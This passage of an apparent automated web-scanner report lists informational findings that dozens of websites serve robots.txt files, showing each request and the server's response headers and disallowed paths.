Host: www.1funny.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:11 GMT
Server: Apache
Last-Modified: Fri, 12 Oct 2007 12:17:40 GMT
Accept-Ranges: bytes
Content-Length: 53
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/

27.33. http://www.1stdibs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1stdibs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1stdibs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:43:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7 PHP/5.2.1
Last-Modified: Wed, 13 Apr 2011 17:05:22 GMT
ETag: "554aa3-196-4a0cfd0681880"
Accept-Ranges: bytes
Content-Length: 406
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: adrian/
Disallow: olga/
Disallow: experimental/
Disallow: administration/
Disallow: libraries/
Disallow: secure/
Disallow: secure_jewelry/
Disallow: cgi-bin/
Disallow: citysea
...[SNIP]...

27.34. http://www.2020software.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2020software.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.2020software.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2008 01:30:46 GMT
Accept-Ranges: bytes
ETag: "865522e7714c91:1566"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Date: Wed, 04 May 2011 01:00:17 GMT
Age: 2376
Content-Length: 721

User-agent: SiteXpert
Disallow: /assistance/
Disallow: /demos/
Disallow: /pricing/
Disallow: /whitepapers/

User-agent: Search-Engine-Studio
Disallow: /assistance/
Disallow: /demos/
Disallow:
...[SNIP]...

27.35. http://www.211.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.211.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.211.org

Response

HTTP/1.1 200 OK
Content-Length: 202
Content-Type: text/plain
Last-Modified: Thu, 16 Dec 2010 20:48:54 GMT
Accept-Ranges: bytes
ETag: "7c8242a7629dcb1:141b8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:27 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /resname.aspx
Disallow: /keywordlist.aspx
Disallow: /detail.aspx
Disallow: /nomatch.aspx
Disallow: /agency.aspx
Disallow: /contact.aspx
Disallow: /matchlist.as
...[SNIP]...

27.36. http://www.24autosurf.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.24autosurf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.24autosurf.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:20 GMT
Server: Apache
Last-Modified: Sun, 30 Jan 2011 00:53:02 GMT
Accept-Ranges: bytes
Content-Length: 4890
Connection: close
Content-Type: text/plain

#
# robots.txt
# Sorry, we do NOT allow nonauthorized robots any longer.
#
User-agent: *
Disallow: /admincpanel/
Disallow: /adminipunblocker/
Disallow: /img/
Disallow: /members/
Disallow: /ba
...[SNIP]...

27.37. http://www.2itb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2itb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.2itb.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:24:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 15 Jan 2007 06:50:11 GMT
ETag: "6bc08c-27-4270ea8270ec0"
Accept-Ranges: bytes
Content-Length: 39
Connection: close
Content-Type: text/plain

User-agent: Googlebot-Image
Disallow: /

27.38. http://www.3d3.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3d3.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.3d3.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:21:42 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_gzip/1.3.26.1a mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 mod_perl/1.29
Last-Modified: Tue, 22 Mar 2011 22:56:28 GMT
ETag: "ec31c-30f-4d89291c"
Accept-Ranges: bytes
Content-Length: 783
Connection: close
Content-Type: text/plain

# robots.txt for http://www.shopfactory.de

User-agent: *
Disallow: */shared_files/
Disallow: */contents/
Disallow: */contents/styles/
Disallow: */contents/*/changecurrency.html
Disallow: */con
...[SNIP]...

27.39. http://www.3news.co.nz/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3news.co.nz
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.3news.co.nz

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: BIGipServerWWW.3NEWS.CO.NZ=1130670272.20480.0000; path=/
Last-Modified: Mon, 31 Jan 2011 23:24:15 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Type: text/plain
Date: Wed, 04 May 2011 03:01:07 GMT
Content-Length: 1680
ETag: "pv52e5180b4a5d43e73b051fbea92b1237"
Expires: Wed, 04 May 2011 03:01:17 GMT
Cache-Control: public, s-maxage=0, max-age=10
X-PvInfo: [S10232.C27177.A22913.RA0.G2725B.U81E038C5].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes

# robots.txt for http://www.3news.co.nz

# Restriction to all bots
#

User-agent: *
Disallow: /portals/0/dart/

# Bots allowed
# Disallow: = allow all from these bots

User-agent: Sensis

...[SNIP]...

27.40. http://www.3planeta.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3planeta.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.3planeta.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:05 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.7 mod_perl/1.29 FrontPage/5.0.2.2510
Last-Modified: Fri, 24 Oct 2008 21:31:07 GMT
ETag: "2dc021-44-49023e9b"
Accept-Ranges: bytes
Content-Length: 68
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow:

27.41. http://www.451press.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.451press.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.451press.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:18:53 GMT
Server: Apache/2
X-Pingback: http://www.451press.com/xmlrpc.php
Set-Cookie: isMobile=0; expires=Wed, 04-May-2011 03:18:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.451press.com/sitemap.xml

27.42. http://www.4hairstyles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4hairstyles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4hairstyles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:28:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 22 Feb 2010 18:41:46 GMT
ETag: "1010ea6-19-c9044e80"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.43. http://www.4yourtype.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4yourtype.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4yourtype.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:09:26 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 08 Mar 2007 20:19:44 GMT
ETag: "9283341cbf61c71:171c"
Content-Length: 124

User-agent: *Disallow: /_mm/Disallow: /_notes/Disallow: /_baks/Disallow: /MMWIP/User-agent: googlebotDisallow: *.csi

27.44. http://www.5ilthy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.5ilthy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.5ilthy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:00:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Jun 2010 12:30:53 GMT
ETag: "2d703b4-8c-48910c6b3d940"
Accept-Ranges: bytes
Content-Length: 140
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /cache/
Disallow: /content/
Disallow: /ftp_content/
Disallow: /includes/
Disallow: /process/

27.45. http://www.6moons.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.6moons.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.6moons.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 04 Jul 2006 19:05:03 GMT
ETag: "c216-43-417c6312f75c0"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain

User-agent:    *
Disallow:    /cgi-bin
Disallow:    /stats
Disallow:    /admin

27.46. http://www.6x6world.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.6x6world.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.6x6world.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:42 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 02 Dec 2008 22:31:05 GMT
ETag: "3e94005-473-45d17e20d5c40"
Accept-Ranges: bytes
Content-Length: 1139
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /forums/attachment.php
Disallow: /forums/newattachment.php
Disallow: /forums/avatar.php
Disallow: /forums/editpost.php
Disallow: /fo
...[SNIP]...

27.47. http://www.7k7k.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.7k7k.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.7k7k.com

Response

HTTP/1.0 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Tue, 29 Mar 2011 17:24:42 GMT
Accept-Ranges: bytes
ETag: "5413b23036eecb1:ae4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:59:58 GMT
Powered-By-ChinaCache: HIT from USA-DA-1-3H2
Connection: close

User-agent: *
Disallow: /doyo/
Disallow: /doyoweb/
Disallow: /yy/

27.48. http://www.98rock.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.98rock.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.98rock.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4238730462
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 02:22:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:22:58 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.49. http://www.a-z-animals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-z-animals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.a-z-animals.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:49:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Nov 2008 06:09:32 GMT
Accept-Ranges: bytes
Content-Length: 85
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /oc/
Disallow: /scriptaculous/
Disallow: /sitemap/
Allow: /


27.50. http://www.a-zlyrics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-zlyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.a-zlyrics.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:58:57 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "32df16e-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

27.51. http://www.aaaxvdo.tk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aaaxvdo.tk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aaaxvdo.tk

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:47:45 GMT
Server: Resin/2.1.17
ETag: "AAAAS9Sxpow"
Last-Modified: Thu, 14 Apr 2011 06:50:38 GMT
Content-Type: text/plain
Content-Length: 67
Connection: close

# Robots.txt file for TK sites
#
User-agent: *
Disallow: /tikilink

27.52. http://www.aacounty.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aacounty.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aacounty.org

Response

HTTP/1.1 200 OK
Content-Length: 1299
Content-Type: text/plain
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=5864385;expires=Fri, 26-Apr-2041 01:01:27 GMT;path=/
Set-Cookie: CFTOKEN=6a15eb885cb6327d-353098A9-98DB-BA18-3FC19BD810EF2A31;expires=Fri, 26-Apr-2041 01:01:27 GMT;path=/
Set-Cookie: SESESSIONID=C91C8D180B00C22D92A244D4C2729523;path=/
Set-Cookie: SESESSIONCODE=DE3E94DE9922F6E516468481D3E775B8;path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:01:26 GMT
Connection: close

User-agent: *
Disallow: /se/
Disallow: /Events/
Disallow: /Holidays/index.cfm
Disallow: /Budget/SpendAffordCalendar.cfm
Disallow: /AdminHear/Calendar.cfm
Disallow: /BdofAppeals/Calendar.cfm
Dis
...[SNIP]...

27.53. http://www.aacrjournals.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aacrjournals.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aacrjournals.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:25:09 GMT
Server: Apache/1.3.26 (Unix) DAV/1.0.3 ApacheJServ/1.1.2
Last-Modified: Tue, 15 Feb 2011 17:10:42 GMT
ETag: "1d-529-4d5ab392"
Accept-Ranges: bytes
Content-Length: 1321
Connection: close
Content-Type: text/plain

User-agent: *
crawl-delay: 10
Disallow: /adsystem
Disallow: /cgi/authordata
Disallow: /cgi/folders
Disallow: /cgi/citemap
Disallow: /cgi/cookietest
Disallow: /cgi/eletter-submit
Disallow: /accesslogs

...[SNIP]...

27.54. http://www.abc.es/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.es
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abc.es

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 15 Apr 2011 09:15:20 GMT
ETag: "daa199a44dfbcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Cache-Control: no-cache
Date: Wed, 04 May 2011 00:44:18 GMT
Content-Length: 880
Connection: close

Sitemap: http://www.abc.es/comunabc/repositorywidgets/sitemap-noticias.asp
Sitemap: http://www.abc.es/sitemapabc-index.xml.gz
Sitemap: http://www.abc.es/sitemap.xml
Sitemap: http://www.abc.es/sitem
...[SNIP]...

27.55. http://www.abc27.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc27.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abc27.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Mon, 14 Jun 2010 21:18:38 GMT
ETag: "60a6287ccb1:9f2"
Cteonnt-Length: 816
Expires: Wed, 04 May 2011 01:24:50 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:24:50 GMT
Content-Length: 816
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.56. http://www.abc6.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc6.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abc6.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS39
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:9bf"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 01:50:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:50:35 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.57. http://www.abenity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abenity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abenity.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:33:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 28 Dec 2010 23:22:19 GMT
ETag: "13a808c-14e-49880b94e60c0"
Accept-Ranges: bytes
Content-Length: 334
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.abenity.com/Sitemap.xml
Disallow: /admin/
Disallow: /ajax/
Disallow: /apps/
Disallow: /css/
Disallow: /dev/
Disallow: /downloads/
Disallow: /openx/
Disallow: /flash/

...[SNIP]...

27.58. http://www.academicinfo.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.academicinfo.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.academicinfo.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 02:04:27 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Thu, 17 Mar 2011 10:15:27 GMT
Accept-Ranges: bytes
Content-Length: 1823
Cache-Control: max-age=10800
Expires: Wed, 04 May 2011 05:04:27 GMT
Vary: Accept-Encoding

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.59. http://www.academixdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.academixdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.academixdirect.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:42:16 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.4 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-3ubuntu4.4
X-Pingback: http://www.academixdirect.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 79
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.academixdirect.com/sitemap.xml.gz

27.60. http://www.accesskent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accesskent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accesskent.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:57:39 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 14:30:45 GMT
ETag: "1a0027-552-49a33dcc8cf40"
Accept-Ranges: bytes
Content-Length: 1362
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AccidentReports
Disallow: /BusinessNames
Disallow: /BondRelease
Disallow: /CCHearing
Disallow: /CommodityCodes
Disallow: /CourtNameSearch
Disallow: /deeds
Disallow: /DMHHServi
...[SNIP]...

27.61. http://www.accessnorthga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accessnorthga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accessnorthga.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:11:37 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Thu, 30 Dec 2010 14:27:08 GMT
ETag: "1c98d56-1f-498a17b062700"
Accept-Ranges: bytes
Content-Length: 31
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/

27.62. http://www.accuratefiles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuratefiles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accuratefiles.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:06:12 GMT
Content-Type: text/plain; charset=utf8
Connection: close
Vary: Accept-Encoding
Last-Modified: Tue, 08 Mar 2011 10:45:38 GMT
ETag: "8c56145-26d-49df650165880"
Accept-Ranges: bytes
Content-Length: 621
Vary: Accept-Encoding

User-agent: *
Disallow: /contact
Disallow: /go
Disallow: /dmca
Disallow: /rate
Disallow: /captcha
Disallow: /login
Disallow: /rss
Disallow: /blog/tag
Disallow: /hint
Disallow: /user
Disallow: /user/fr
...[SNIP]...

27.63. http://www.acorn-online.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acorn-online.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acorn-online.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:09 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 21 Dec 2010 20:39:46 GMT
ETag: "2b4a0bd-334-497f1a317c880"
Accept-Ranges: bytes
Content-Length: 820
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.acorn-online.com/sitemap.xml

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /crap/
Disallow: /components/
Disallow: /images/
Disallow: /includes
...[SNIP]...

27.64. http://www.activedayton.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.activedayton.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.activedayton.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Jun 2009 14:51:04 GMT
ETag: "1cec243-72-46b72c9dd2600"
Accept-Ranges: bytes
Content-Length: 114
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 00:53:05 GMT
Connection: close

User-agent: *
Disallow: /e/events
Disallow: /dayton/events2
Disallow: /events/events2
Disallow: /*printArticle=y*

27.65. http://www.activitypad.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.activitypad.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.activitypad.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:25:30 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 24 Nov 2009 09:05:31 GMT
ETag: "54573b-48-3e77ecc0"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

User-agent: Mediapartners-Google
Disallow:

27.66. http://www.actustar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actustar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.actustar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:50 GMT
Server: Apache/2.2.9
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%222bdfa5e5e3bf3504e89d14a7f82bdc4b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221304471390%22%3B%7D519c85db262234dfe29b9f89c8fcf412; expires=Wed, 04-May-2011 03:09:50 GMT; path=/
Set-Cookie: PHPSESSID=5ee57303a2f33cc788555b5b2777e0ec; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: billboard=1; path=/; domain=.actustar.com
Vary: Accept-Encoding
Content-Length: 90
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /adsite-under
Sitemap: http://www.actustar.com/sitemap/sitemap.xml

27.67. http://www.acu-cell.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acu-cell.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acu-cell.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:38 GMT
Server: Apache/1.3.41 (Unix) mod_layout/3.4 DAV/1.0.3 FrontPage/5.0.2.2635
Last-Modified: Tue, 01 Mar 2011 15:30:02 GMT
ETag: "32e844c-44-4d6d10fa"
Accept-Ranges: bytes
Content-Length: 68
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:
User-Agent: *
Allow: /

27.68. http://www.adbabylon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbabylon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adbabylon.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:39 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 08:30:41 GMT
ETag: "e88038-130-48533b574ce40"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.69. http://www.admitoneproducts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.admitoneproducts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.admitoneproducts.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:40:34 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Mon, 11 Apr 2011 21:18:35 GMT
